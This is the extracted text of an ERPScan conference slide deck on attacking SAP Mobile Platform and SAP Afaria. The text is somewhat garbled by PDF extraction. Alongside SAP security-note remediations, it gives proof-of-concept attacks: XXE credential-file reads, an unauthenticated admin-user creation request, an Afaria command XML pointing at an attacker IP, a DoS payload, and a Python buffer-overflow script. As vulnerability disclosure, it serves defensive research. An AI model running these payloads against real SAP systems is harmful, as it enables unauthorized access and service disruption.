Attacking SAP Mobile

Invest  in  security  to  secure  investments  

A"acking  SAP  Mobile  

Dmitry  Chastukhin.  ERPScan  

About  ERPScan  

•  The   only   360-­‐degree   SAP   Security   solu=on   -­‐   ERPScan   Security  Monitoring  Suite  for  SAP  

•  Leader  by  the  number  of  acknowledgements  from  SAP  (  150+  )  •  60+  presentaCons  key  security  conferences  worldwide  •  25  Awards  and  nominaCons  •  Research  team  -­‐  20  experts  with  experience  in    different  areas  

of  security  •  Headquarters  in  Palo  Alto  (US)  and  Amsterdam  (EU)      

2  

SAP  Mobile  Pla,orm  

3  

What  is  it?  

4  

SMP  architecture  

5  

Supported  plaMorms  

Objec=ve-­‐C   .NET  

6  

SMP  protocols  

   SUP  2.1.3   SUP  2.2   SMP  2.3   SMP  3.0  

SMP  Messaging   x   x   x   x  SMP  ReplicaCon   x   x   x   x  HTTP  Rest  API   x   x   x  SAP  Agentry   x   x  

7  

SMP  services  

8  

•  SAP  Control  Center  

•  SAP  SQL  Anywhere  services  

•  SAP  Mobile  Server  

SAP  Control  Center    (Portal)  

•  Working  process:  sccservice.exe    •  Open  ports:  

–  2100  (Messaging  service)  –  8282/8283  (Portal)  –  9999  (RMI)  

9  

SMP  services  

10  

•  SAP  Control  Center  

•  SAP  SQL  Anywhere  services  

•  SAP  Mobile  Server  

SQL  Anywhere  

11  

SMP  services  

12  

•  SAP  Control  Center  

•  SAP  SQL  Anywhere  services  

•  SAP  Mobile  Server  

SAP  Mobile  Server  services  

       •  MobiLink  •  AdminWebServices  

•  MlsrvWrapper  •  InfoboxMul=plexer  

•  OBMO  •  JMSBridge  

13  

SAP  Mobile  Server  (MobiLink)  

14  

•  Uses  Cassini  Web  Server  1.0  

•  Listens  to  the  local  port  5100    

15  

AdminWebServices  

SAP  Mobile  Pla,orm  vulnerabili6es  

16  

DecrypCng  the    SAP  Mobile  PlaMorm  GIOP  protocol  

17  

DecrypCng  the    SAP  Mobile  PlaMorm  GIOP  protocol  

•  GIOP  –  General  Inter-­‐ORB  Protocol  (GIOP)  is  the  abstract  protocol  by  which  object  request  brokers  (ORBs)  communicate  

•  Uses  mlsrv16.exe  (Mobilink)  –  port  2000  

18  

DecrypCng  the    SAP  Mobile  PlaMorm  GIOP  protocol  

19  

XXE  in  the     SAP Mobile Platform portal  page…  

•  Portal  URL:  h8ps://IP_ADDR:8283/scc  •  web.xml  &  services-­‐config.xml    

C:\SAP\SCC-­‐3_2\services\EmbeddedWebContainer\container\Je8y-­‐7.6.2.v20120308\work\je8y-­‐0.0.0.0-­‐8282-­‐scc.war-­‐_scc-­‐any-­‐\webapp\WEB-­‐INF\web.xml  

<servlet-mapping>

<servlet-name>MessageBrokerServlet</servlet-name>

<url-pattern>/messagebroker/*</url-pattern>

</servlet-mapping>

20  

…XXE…  

C:\SAP\SCC-­‐3_2\services\EmbeddedWebContainer\container\Je8y-­‐7.6.2.v20120308\work\je8y-­‐0.0.0.0-­‐8282-­‐scc.war-­‐_scc-­‐any-­‐\webapp\WEB-­‐INF\flex\services-­‐config.xml  

********************************  

<channel-definition id="scc-http"

class="mx.messaging.channels.HTTPChannel">

<endpoint url="http://{server.name}:{server.port}/scc/messagebroker/http"

class="flex.messaging.endpoints.HTTPEndpoint" />

</channel-definition>

********************************  

1.  /scc/messagebroker/amfpolling  

2.  /scc/messagebroker/amfsecurepolling  

3.  /scc/messagebroker/h"p  

4.  /scc/messagebroker/h"psecure  

5.  /scc/messagebroker/amflongpolling  

21  

…XXE  

22  

Read  file  with  XXE  

C:\SAP\MobilePla,orm\Servers\UnwiredServer\Repository\Instance\com\sybase\sup\server\SUPServer\sup.proper6es  

sup.imo.upa = 457ba103a46559486a81350d552a9e47fb085927eb6df0ccc79231bc3d

23  

Decrypt  sup.imo.upa  

24  

PrevenCon  

•  Install  SAP  Security  note  2125358  •  SAP  Mobile  Pladorm  XXE  vulnarability  

25  

SAP  Mobile  PlaMorm    unauthenCcated  access  to  other  servlets  

•  Architecture  and  program  vulnerabili6es  in  SAP’s  J2EE  engine  

(BlackHat  USA  2011)  

•  web.xml  files  revealed  hidden  methods  to:  

–  Read  and  generate  logs  

–  Deploy  and  install  JAR  packages  

26  

AdminWebService  

POST /MobileOffice/Admin.asmx/AddAdminUser HTTP/1.1 Host: 127.0.0.1 Content-Type: application/x-www-form-urlencoded Content-Length: length strUserName=Admin2&strActivationCode=123QWEasd&iExpirationHours=100

27  

SAP  SQL  Anywhere  BoF/Code  ExecuCon    

•  CVE-­‐2008-­‐0912  –  The  MobiLink  server  is  affected  by  a  heap  overflow  which  happens  

during  the  handling  of  strings  like  username,  version,  and  remote  ID  (all  

pre-­‐auth)  which  are  longer  than  128  bytes  

•  CVE-­‐2014-­‐9264    –  Stack-­‐based  buffer  overflow  in  the  .NET  Data  Provider  in  SAP  SQL  

Anywhere  allows  remote  a"ackers  to  execute  arbitrary  code  via  a  

craked  column  alias  

28  

First  PSH  request    

29  

First  PSH  request    

•     

30  

SQL  Anywhere  DoS  

31  

PrevenCon  

•  Install  SAP  security  note  2108161  •  Denial  of  service  in  SAP  SQL  Anywhere  

32  

SAP  EMR  Unwired  SQL  injecCon  

•  CVE-­‐2013-­‐7096  (CVSS  7.5)  •  AndroidManifest.xml:                            <provider

android:name=".providers.ModiDataDbProvider"

android:authorities="com.sap.mobi.docsprovider" />  

1.  content://com.sap.mobi.docsprovider/documents/offline_cat  

2.  content://com.sap.mobi.docsprovider/documents/offline/  

3.  content://com.sap.mobi.docsprovider/documents/sample  

4.  content://com.sap.mobi.docsprovider/documents/online  

5.  content://com.sap.mobi.docsprovider/documents/offline_auth  

6.  content://com.sap.mobi.docsprovider/documents/offline  

7.  content://com.sap.mobi.docsprovider/documents/online_auth  

8.  content://com.sap.mobi.docsprovider/documents/sample/  

9.  content://com.sap.mobi.docsprovider/documents/online_cat  

33  

Preven=on  

•  Install  SAP  security  note  1864518  •  Security  Improvements  for  MOB-­‐APP-­‐EMR-­‐AND  

34  

SAP  Afaria  

35  

SAP  Afaria  

•  MDM  Solu=on  –  Version  7.0  SP5:  Released  August  2014  (  as  SAP  Afaria  SP5)  –  Version  7.0  SP4:  Released  December  2013  (as  SAP  Afaria  SP4)  –  Version  7.0  SP2:  Released  December  2012  (as  SAP  Afaria  SP2)  –  Version  7.0:  Released  April  2012  (as  SAP  Afaria)  –  Version  6.6:  Released  September  2010  –  Version  6.5:  Released  November  2009  –  Version  6.0:  Released  December  2008  –  Version  5.0:  Released  November  2003  –  Version  4.0:  Released  June  2000  (as  Afaria)  –  Version  3.5:  Released  May  2000  (as  Afaria  for  Handhelds)  –  Version  3.0:  Released  October  1999  –  Version  2.0:  Released  February  1999  (as  CONNECT:Manage)  –  Version  1.2:  Released  October  1997  (as  RemoteWare  Express)  –  Version  1.0:  Released  February  1997  (as  SessionXpress)  

36  

How  it  works  

•  Provide  and  enroll  devices  in  management    

•  Define  device  sepngs    

•  Secure  devices  and  data    

•  Collect  inventory    

•  Distribute  sokware    

•  Collect  device  ac=vity  data    

 for  managing  expenses    

37  

Enrollment  policy  

38  

ConfiguraCon  policy  

39  

ApplicaCon  policy  

40  

Device  informaCon  

41  

Device  informaCon  

42  

Device  informaCon  

43  

CommunicaCon  

44  

SAP  Afaria  vulnerabili6es  

45  

Good  news  

46  

Good  news  

47  

Missing  authorizaCon  

•  Command  value  Run  Channel  or  Test  •  The  XML  request  must  start  with  4  spaces  •  PoC:   <AfariaNotify version="1.0.0"> <Message type="Command" value="Run Channel"> <Client name="AFARIA70PT"> <Client name="LOCALHOST"

GUID="59146189-1f92-46d5-85aa-6293631d5d2e"> <Transmitter address="172.16.2.67:4444\asd"> <Channel address="\\172.16.2.67:4444\asd" name="\

\172.16.2.67:4444\df"></Channel> </Transmitter> </Client> </Message> </AfariaNotify>

48  

PrevenCon  

Install  SAP  security  note  2134905  Missing  authoriza=on  check  in  XCListener  

49  

•  Install  SAP  security  note  1864518  •  Security  Improvements  for  MOB-­‐APP-­‐EMR-­‐AND  

XcListener  DoS  

<AfariaNotify version="1.0.0">

<Message type="Command" value="Run Channel" > <Client name="LOCALHOST" >

<Client name="LOCALHOST" GUID="59146189-1f92-46d5-85aa-6293631d5d2e">

<Transmitter address="172.16.2.67:4444\">

<Channel address="\\172.16.2.67:4444\asd" name="\\172.16.2.67:4444\(A*1491)">

</Channel> </Transmitter>

</Client>

</Message>

</AfariaNotify>(A*3678)

50  

XcListener  BoF  

•  PoC:   import socket HOST = ‘hostname' PORT = 3005 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) poc = 'A'*4098 s.send(poc) data = s.recv(10000) s.close() print 'Received', (data)

51  

PrevenCon  

•  Install  SAP  security  note  2132584  •  Buffer  overflow  in  SAP  Afaria  7  XcListener  

52  

Each  SAP   landscape   is  unique  and  we  pay  close  a8en6on  to  the  requirements  of  our   customers   and   prospects.   ERPScan   development   team   constantly   addresses  these  specific  needs  and   is  ac6vely   involved   in  product  advancement.   If  you  wish  to   know   whether   our   scanner   addresses   a   par6cular   aspect,   or   simply   have   a  feature  wish  list,  please  e-­‐mail  us.  We  will  be  glad  to  consider  your  sugges6ons  for  the  future  releases  or  monthly  updates.  

53  

About  

228  Hamilton  Avenue,  Fl.  3,  Palo  Alto,  CA.  94301  

 USA  HQ  

Luna  ArenA  238  Herikerbergweg,    1101  CM  Amsterdam    

 EU  HQ  

 www.erpscan.com    [email protected]